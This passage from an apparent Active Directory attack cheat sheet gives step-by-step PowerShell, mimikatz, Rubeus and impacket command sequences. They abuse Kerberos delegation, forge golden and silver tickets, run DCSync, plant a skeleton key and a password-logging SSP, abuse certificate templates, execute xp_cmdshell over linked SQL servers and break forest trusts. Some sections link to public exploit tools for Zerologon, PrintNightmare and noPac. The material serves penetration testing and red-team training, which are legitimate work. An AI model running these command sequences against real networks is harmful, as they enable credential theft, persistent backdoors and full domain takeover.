him!_ 841 842 Using PowerView: 843 844 ```powershell 845 #Discover domain joined computers that have Unconstrained Delegation enabled 846 Get-NetComputer -UnConstrained 847 848 #List tickets and check if a DA or some High Value target has stored its TGT 849 Invoke-Mimikatz -Command '"sekurlsa::tickets"' 850 851 #Command to monitor any incoming sessions on our compromised server 852 Invoke-UserHunter -ComputerName <NameOfTheComputer> -Poll <TimeOfMonitoringInSeconds> -UserName <UserToMonitorFor> -Delay 853 <WaitInterval> -Verbose 854 855 #Dump the tickets to disk: 856 Invoke-Mimikatz -Command '"sekurlsa::tickets /export"' 857 858 #Impersonate the user using ptt attack: 859 Invoke-Mimikatz -Command '"kerberos::ptt <PathToTicket>"' 860 ``` 861 862 **Note:** We can also use Rubeus! 863 864 ### Constrained Delegation 865 866 Using PowerView and Kekeo: 867 868 ```powershell 869 #Enumerate Users and Computers with constrained delegation 870 Get-DomainUser -TrustedToAuth 871 Get-DomainComputer -TrustedToAuth 872 873 #If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo 874 tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser> 875 876 #Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation 877 tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN> 878 879 #Finally use mimikatz to ptt the TGS 880 Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"' 881 ``` 882 883 _ALTERNATIVE:_ 884 Using Rubeus: 885 886 ```powershell 887 Rubeus.exe s4u /user:<UserName> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<UserToImpersonate> /msdsspn:"<Service's SPN>" /altservice:<Optional> /ptt 888 ``` 889 890 Now we can access the service as the impersonated user! 891 892 :triangular_flag_on_post: **What if we have delegation rights for only a specific SPN? (e.g TIME):** 893 894 In this case we can still abuse a feature of kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. Thats gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine. 895 896 ### Resource Based Constrained Delegation 897 898 _WUT IS DIS?: \ 899 TL;DR \ 900 If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access._ 901 902 Tools we are going to use: 903 904 - [PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon) 905 - [Powermad](https://github.com/Kevin-Robertson/Powermad) 906 - [Rubeus](https://github.com/GhostPack/Rubeus) 907 908 First we need to enter the security context of the user/machine account that has the privileges over the object. 909 If it is a user account we can use Pass the Hash, RDP, PSCredentials etc. 910 911 Exploitation Example: 912 913 ```powershell 914 #Import Powermad and use it to create a new MACHINE ACCOUNT 915 . .\Powermad.ps1 916 New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose 917 918 #Import PowerView and get the SID of our new created machine account 919 . .\PowerView.ps1 920 $ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid 921 922 #Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor: 923 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" 924 $SDBytes = New-Object byte[] ($SD.BinaryLength) 925 $SD.GetBinaryForm($SDBytes, 0) 926 927 #Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView 928 Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose 929 930 #After that we need to get the RC4 hash of the new machine account's password using Rubeus 931 Rubeus.exe hash /password:'p@ssword!' 932 933 #And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus 934 Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt 935 936 #Finally we can access the C$ drive of the target machine 937 dir \\TargetMachine.wtver.domain\C$ 938 ``` 939 940 Detailed Articles: 941 942 - [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) 943 - [RESOURCE-BASED CONSTRAINED DELEGATION ABUSE](https://blog.stealthbits.com/resource-based-constrained-delegation-abuse/) 944 945 :exclamation: In Constrain and Resource-Based Constrained Delegation if we don't have the password/hash of the account with TRUSTED_TO_AUTH_FOR_DELEGATION that we try to abuse, we can use the very nice trick "tgt::deleg" from kekeo or "tgtdeleg" from rubeus and fool Kerberos to give us a valid TGT for that account. Then we just use the ticket instead of the hash of the account to perform the attack. 946 947 ```powershell 948 #Command on Rubeus 949 Rubeus.exe tgtdeleg /nowrap 950 ``` 951 952 Detailed Article: 953 [Rubeus – Now With More Kekeo](https://www.harmj0y.net/blog/redteaming/rubeus-now-with-more-kekeo/) 954 955 ### DNSAdmins Abuse 956 957 _WUT IS DIS ?: If a user is a member of the DNSAdmins group, he can possibly load an arbitary DLL with the privileges of dns.exe that runs as SYSTEM. In case the DC serves a DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work._ 958 959 1. Enumerate the members of the DNSAdmins group: 960 - PowerView: `Get-NetGroupMember -GroupName "DNSAdmins"` 961 - AD Module: `Get-ADGroupMember -Identiny DNSAdmins` 962 2. Once we found a member of this group we need to compromise it (There are many ways). 963 3. Then by serving a malicious DLL on a SMB share and configuring the dll usage,we can escalate our privileges: 964 965 ```powershell 966 #Using dnscmd: 967 dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll 968 969 #Restart the DNS Service: 970 sc \\DNSServer stop dns 971 sc \\DNSServer start dns 972 ``` 973 974 ### Abusing Active Directory-Integraded DNS 975 976 - [Exploiting Active Directory-Integrated DNS](https://blog.netspi.com/exploiting-adidns/) 977 - [ADIDNS Revisited](https://blog.netspi.com/adidns-revisited/) 978 - [Inveigh](https://github.com/Kevin-Robertson/Inveigh) 979 980 ### Abusing Backup Operators Group 981 982 _WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup Operators 983 group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC, 984 extract the ntds.dit database file, dump the hashes and escalate our privileges to DA._ 985 986 1. Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow: 987 988 ```powershell 989 #Create a .txt file that will contain the shadow copy process script 990 Script ->{ 991 set context persistent nowriters 992 set metadata c:\windows\system32\spool\drivers\color\example.cab 993 set verbose on 994 begin backup 995 add volume c: alias mydrive 996 997 create 998 999 expose %mydrive% w: 1000 end backup 1001 } 1002 1003 #Execute diskshadow with our script as parameter 1004 diskshadow /s script.txt 1005 ``` 1006 1007 2. Next we need to access the shadow copy, we may have the SeBackupPrivilege but we cant just 1008 simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy it on an accessible folder. For this we are 1009 going to use [this](https://github.com/giuliano108/SeBackupPrivilege) amazing repo: 1010 1011 ```powershell 1012 #Importing both dlls from the repo using powershell 1013 Import-Module .\SeBackupPrivilegeCmdLets.dll 1014 Import-Module .\SeBackupPrivilegeUtils.dll 1015 1016 #Checking if the SeBackupPrivilege is enabled 1017 Get-SeBackupPrivilege 1018 1019 #If it isn't we enable it 1020 Set-SeBackupPrivilege 1021 1022 #Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice 1023 Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite 1024 1025 #Dump the SYSTEM hive 1026 reg save HKLM\SYSTEM c:\temp\system.hive 1027 ``` 1028 1029 3. Using smbclient.py from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine. 1030 4. Use secretsdump.py from impacket and dump the hashes. 1031 5. Use psexec or another tool of your choice to PTH and get Domain Admin access. 1032 1033 ### Abusing Exchange 1034 1035 - [Abusing Exchange one Api call from DA](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/) 1036 - [CVE-2020-0688](https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys) 1037 - [PrivExchange](https://github.com/dirkjanm/PrivExchange) Exchange your privileges for Domain Admin privs by abusing Exchange 1038 1039 ### Weaponizing Printer Bug 1040 1041 - [Printer Server Bug to Domain Administrator](https://www.dionach.com/blog/printer-server-bug-to-domain-administrator/) 1042 - [NetNTLMtoSilverTicket](https://github.com/NotMedic/NetNTLMtoSilverTicket) 1043 1044 ### Abusing ACLs 1045 1046 - [Escalating privileges with ACLs in Active Directory](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) 1047 - [aclpwn.py](https://github.com/fox-it/aclpwn.py) 1048 - [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) 1049 1050 ### Abusing IPv6 with mitm6 1051 1052 - [Compromising IPv4 networks via IPv6](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/) 1053 - [mitm6](https://github.com/fox-it/mitm6) 1054 1055 ### SID History Abuse 1056 1057 _WUT IS DIS?: If we manage to compromise a child domain of a forest and [SID filtering](https://www.itprotoday.com/windows-8/sid-filtering) isn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain Administrator of the root domain of the forest. This is possible because of the [SID History](https://www.itprotoday.com/windows-8/sid-history) field on a kerberos TGT ticket, that defines the "extra" security groups and privileges._ 1058 1059 Exploitation example: 1060 1061 ```powershell 1062 #Get the SID of the Current Domain using PowerView 1063 Get-DomainSID -Domain current.root.domain.local 1064 1065 #Get the SID of the Root Domain using PowerView 1066 Get-DomainSID -Domain root.domain.local 1067 1068 #Create the Enteprise Admins SID 1069 Format: RootDomainSID-519 1070 1071 #Forge "Extra" Golden Ticket using mimikatz 1072 kerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi 1073 1074 #Inject the ticket into memory 1075 kerberos::ptt \path\to\ticket\golden.kirbi 1076 1077 #List the DC of the Root Domain 1078 dir \\dc.root.domain.local\C$ 1079 1080 #Or DCsync and dump the hashes using mimikatz 1081 lsadump::dcsync /domain:root.domain.local /all 1082 ``` 1083 1084 Detailed Articles: 1085 1086 - [Kerberos Golden Tickets are Now More Golden](https://adsecurity.org/?p=1640) 1087 - [A Guide to Attacking Domain Trusts](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/) 1088 1089 ### Exploiting SharePoint 1090 1091 - [CVE-2019-0604](https://medium.com/@gorkemkaradeniz/sharepoint-cve-2019-0604-rce-exploitation-ab3056623b7d) RCE Exploitation \ 1092 [PoC](https://github.com/k8gege/CVE-2019-0604) 1093 - [CVE-2019-1257](https://www.zerodayinitiative.com/blog/2019/9/18/cve-2019-1257-code-execution-on-microsoft-sharepoint-through-bdc-deserialization) Code execution through BDC deserialization 1094 - [CVE-2020-0932](https://www.zerodayinitiative.com/blog/2020/4/28/cve-2020-0932-remote-code-execution-on-microsoft-sharepoint-using-typeconverters) RCE using typeconverters \ 1095 [PoC](https://github.com/thezdi/PoC/tree/master/CVE-2020-0932) 1096 1097 ### Zerologon 1098 1099 - [Zerologon: Unauthenticated domain controller compromise](https://www.secura.com/whitepapers/zerologon-whitepaper): White paper of the vulnerability. 1100 - [SharpZeroLogon](https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon): C# implementation of the Zerologon exploit. 1101 - [Invoke-ZeroLogon](https://github.com/BC-SECURITY/Invoke-ZeroLogon): PowerShell implementation of the Zerologon exploit. 1102 - [Zer0Dump](https://github.com/bb00/zer0dump): Python implementation of the Zerologon exploit using the impacket library. 1103 1104 ### PrintNightmare 1105 1106 - [CVE-2021-34527](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527): Vulnerability details. 1107 - [Impacket implementation of PrintNightmare](https://github.com/cube0x0/CVE-2021-1675): Reliable PoC of PrintNightmare using the impacket library. 1108 - [C# Implementation of CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare): Reliable PoC of PrintNightmare written in C#. 1109 1110 ### Active Directory Certificate Services 1111 1112 **Check for Vulnerable Certificate Templates with:** [Certify](https://github.com/GhostPack/Certify) 1113 1114 _Note: Certify can be executed with Cobalt Strike's `execute-assembly` command as well_ 1115 1116 ```powershell 1117 .\Certify.exe find /vulnerable /quiet 1118 ``` 1119 1120 Make sure the msPKI-Certificates-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that the Enrollment Rights 1121 allow Domain/Authenticated Users. Additionally, check that the pkiextendedkeyusage parameter contains the "Client Authentication" value as well as that the "Authorized Signatures Required" parameter is set to 0. 1122 1123 This exploit only works because these settings enable server/client authentication, meaning an attacker can specify the UPN of a Domain Admin ("DA") 1124 and use the captured certificate with Rubeus to forge authentication. 1125 1126 _Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended. Check before choosing a DA to target._ 1127 1128 Request the DA's Account Certificate with Certify 1129 1130 ```powershell 1131 .\Certify.exe request /template:<Template Name> /quiet /ca:"<CA Name>" /domain:<domain.com> /path:CN=Configuration,DC=<domain>,DC=com /altname:<Domain Admin AltName> /machine 1132 ``` 1133 1134 This should return a valid certificate for the associated DA account. 1135 1136 The exported `cert.pem` and `cert.key` files must be consolidated into a single `cert.pem` file, with one gap of whitespace between the `END RSA PRIVATE KEY` and the `BEGIN CERTIFICATE`. 1137 1138 _Example of `cert.pem`:_ 1139 1140 ``` 1141 -----BEGIN RSA PRIVATE KEY----- 1142 BIIEogIBAAk15x0ID[...] 1143 [...] 1144 [...] 1145 -----END RSA PRIVATE KEY----- 1146 1147 -----BEGIN CERTIFICATE----- 1148 BIIEogIBOmgAwIbSe[...] 1149 [...] 1150 [...] 1151 -----END CERTIFICATE----- 1152 ``` 1153 1154 #Utilize `openssl` to Convert to PKCS #12 Format 1155 1156 The `openssl` command can be utilized to convert the certificate file into PKCS #12 format (you may be required to enter an export password, which can be anything you like). 1157 1158 ```bash 1159 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx 1160 ``` 1161 1162 Once the `cert.pfx` file has been exported, upload it to the compromised host (this can be done in a variety of ways, such as with Powershell, SMB, `certutil.exe`, Cobalt Strike's upload functionality, etc.) 1163 1164 After the `cert.pfx` file has been uploaded to the compromised host, [Rubeus](https://github.com/GhostPack/Rubeus) can be used to request a Kerberos TGT for the DA account which will then be imported into memory. 1165 1166 ```powershell 1167 .\Rubeus.exe asktht /user:<Domain Admin AltName> /domain:<domain.com> /dc:<Domain Controller IP or Hostname> /certificate:<Local Machine Path to cert.pfx> /nowrap /ptt 1168 ``` 1169 1170 This should result in a successfully imported ticket, which then enables an attacker to perform various malicious acitivities under DA user context, such as performing a DCSync attack. 1171 1172 ### No PAC 1173 1174 - [sAMAccountname Spoofing](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) Exploitation of CVE-2021-42278 and CVE-2021-42287 1175 - [Weaponisation of CVE-2021-42287/CVE-2021-42278](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) Exploitation of CVE-2021-42278 and CVE-2021-42287 1176 - [noPAC](https://github.com/cube0x0/noPac) C# tool to exploit CVE-2021-42278 and CVE-2021-42287 1177 - [sam-the-admin](https://github.com/WazeHell/sam-the-admin) Python automated tool to exploit CVE-2021-42278 and CVE-2021-42287 1178 - [noPac](https://github.com/Ridter/noPac) Evolution of "sam-the-admin" tool 1179 1180 ## Domain Persistence 1181 1182 ### Golden Ticket Attack 1183 1184 ```powershell 1185 #Execute mimikatz on DC as DA to grab krbtgt hash: 1186 Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <DC'sName> 1187 1188 #On any machine: 1189 Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt: 1190 <HashOfkrbtgtAccount> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' 1191 ``` 1192 1193 ### DCsync Attack 1194 1195 ```powershell 1196 #DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges): 1197 Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DomainName>\<AnyDomainUser>"' 1198 1199 #DCsync using secretsdump.py from impacket with NTLM authentication 1200 secretsdump.py <Domain>/<Username>:<Password>@<DC'S IP or FQDN> -just-dc-ntlm 1201 1202 #DCsync using secretsdump.py from impacket with Kerberos Authentication 1203 secretsdump.py -no-pass -k <Domain>/<Username>@<DC'S IP or FQDN> -just-dc-ntlm 1204 ``` 1205 1206 **Tip:** \ 1207 /ptt -> inject ticket on current running session \ 1208 /ticket -> save the ticket on the system for later use 1209 1210 ### Silver Ticket Attack 1211 1212 ```powershell 1213 Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<TheTargetMachine> /service: 1214 <ServiceType> /rc4:<TheSPN's Account NTLM Hash> /user:<UserToImpersonate> /ptt"' 1215 ``` 1216 1217 [SPN List](https://adsecurity.org/?page_id=183) 1218 1219 ### Skeleton Key Attack 1220 1221 ```powershell 1222 #Exploitation Command runned as DA: 1223 Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC's FQDN> 1224 1225 #Access using the password "mimikatz" 1226 Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator 1227 ``` 1228 1229 ### DSRM Abuse 1230 1231 _WUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC!_ 1232 1233 ```powershell 1234 #Dump DSRM password (needs DA privs): 1235 Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC's Name> 1236 1237 #This is a local account, so we can PTH and authenticate! 1238 #BUT we need to alter the behaviour of the DSRM account before pth: 1239 #Connect on DC: 1240 Enter-PSSession -ComputerName <DC's Name> 1241 1242 #Alter the Logon behaviour on registry: 1243 New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose 1244 1245 #If the property already exists: 1246 Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose 1247 ``` 1248 1249 Then just PTH to get local admin access on DC! 1250 1251 ### Custom SSP 1252 1253 _WUT IS DIS?: We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on!_ 1254 1255 From powershell: 1256 1257 ```powershell 1258 #Get current Security Package: 1259 $packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty 'Security Packages' 1260 1261 #Append mimilib: 1262 $packages += "mimilib" 1263 1264 #Change the new packages name 1265 Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages 1266 Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name 'Security Packages' -Value $packages 1267 1268 #ALTERNATIVE: 1269 Invoke-Mimikatz -Command '"misc::memssp"' 1270 ``` 1271 1272 Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log 1273 1274 ## Cross Forest Attacks 1275 1276 ### Trust Tickets 1277 1278 _WUT IS DIS ?: If we have Domain Admin rights on a Domain that has Bidirectional Trust relationship with an other forest we can get the Trust key and forge our own inter-realm TGT._ 1279 1280 :warning: The access we will have will be limited to what our DA account is configured to have on the other Forest! 1281 1282 - Using Mimikatz: 1283 1284 ```powershell 1285 #Dump the trust key 1286 Invoke-Mimikatz -Command '"lsadump::trust /patch"' 1287 Invoke-Mimikatz -Command '"lsadump::lsa /patch"' 1288 1289 #Forge an inter-realm TGT using the Golden Ticket attack 1290 Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<OurDomain> /sid: 1291 <OurDomainSID> /rc4:<TrustKey> /service:krbtgt /target:<TheTargetDomain> /ticket: 1292 <PathToSaveTheGoldenTicket>"' 1293 ``` 1294 1295 :exclamation: Tickets -> .kirbi format 1296 1297 Then Ask for a TGS to the external Forest for any service using the inter-realm TGT and access the resource! 1298 1299 - Using Rubeus: 1300 1301 ```powershell 1302 .\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt 1303 ``` 1304 1305 ### Abuse MSSQL Servers 1306 1307 - Enumerate MSSQL Instances: `Get-SQLInstanceDomain` 1308 - Check Accessibility as current user: 1309 1310 ```powershell 1311 Get-SQLConnectionTestThreaded 1312 Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose 1313 ``` 1314 1315 - Gather Information about the instance: `Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose` 1316 - Abusing SQL Database Links: \ 1317 _WUT IS DIS?: A database link allows a SQL Server to access other resources like other SQL Server. If we have two linked SQL Servers we can execute stored procedures in them. Database links also works across Forest Trust!_ 1318 1319 Check for existing Database Links: 1320 1321 ```powershell 1322 #Check for existing Database Links: 1323 #PowerUpSQL: 1324 Get-SQLServerLink -Instance <SPN> -Verbose 1325 1326 #MSSQL Query: 1327 select * from master..sysservers 1328 ``` 1329 1330 Then we can use queries to enumerate other links from the linked Database: 1331 1332 ```powershell 1333 #Manualy: 1334 select * from openquery("LinkedDatabase", 'select * from master..sysservers') 1335 1336 #PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests): 1337 Get-SQLServerLinkCrawl -Instance <SPN> -Verbose 1338 1339 # Enable RPC Out (Required to Execute XP_CMDSHELL) 1340 EXEC sp_serveroption 'sqllinked-hostname', 'rpc', 'true'; 1341 EXEC sp_serveroption 'sqllinked-hostname', 'rpc out', 'true'; 1342 select * from openquery("SQL03", 'EXEC sp_serveroption ''SQL03'',''rpc'',''true'';'); 1343 select * from openquery("SQL03", 'EXEC sp_serveroption ''SQL03'',''rpc out'',''true'';'); 1344 1345 #Then we can execute command on the machine's were the SQL Service runs using xp_cmdshell 1346 #Or if it is disabled enable it: 1347 EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN" 1348 ``` 1349 1350 Query execution: 1351 1352 ```powershell 1353 Get-SQLServerLinkCrawl -Instace <SPN> -Query "exec master..xp_cmdshell 'whoami'" 1354 ``` 1355 1356 ### Breaking Forest Trusts 1357 1358 _WUT IS DIS?: \ 1359 TL;DR \ 1360 If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has enabled unconstrained delegation (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture it's TGT, inject it into memory and DCsync to dump it's hashes, giving ous complete access over the whole forest._ 1361 1362 Tools we are going to use: 1363 1364 - [Rubeus](https://github.com/GhostPack/Rubeus) 1365 - [SpoolSample](https://github.com/leechristensen/SpoolSample) 1366 - [Mimikatz](https://github.com/gentilkiwi/mimikatz) 1367 1368 Exploitation example: 1369 1370 ```powershell 1371 #Start monitoring for TGTs with rubeus: 1372 Rubeus.exe monitor /interval:5 /filteruser:target-dc 1373 1374 #Execute the printerbug to trigger the force authentication of the target DC to our machine 1375 SpoolSample.exe target-dc.external.forest.local dc.compromised.domain.local 1376 1377 #Get the base64 captured TGT from Rubeus and inject it into memory: 1378 Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket> 1379 1380 #Dump the hashes of the target domain using mimikatz: 1381 lsadump::dcsync /domain:external.forest.local /all 1382 ``` 1383 1384 Detailed Articles: 1385 1386 - [Not A Security Boundary: Breaking Forest Trusts](https://blog.harmj0y.net/redteaming/not-a-security-boundary-breaking-forest-trusts/) 1387 - [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)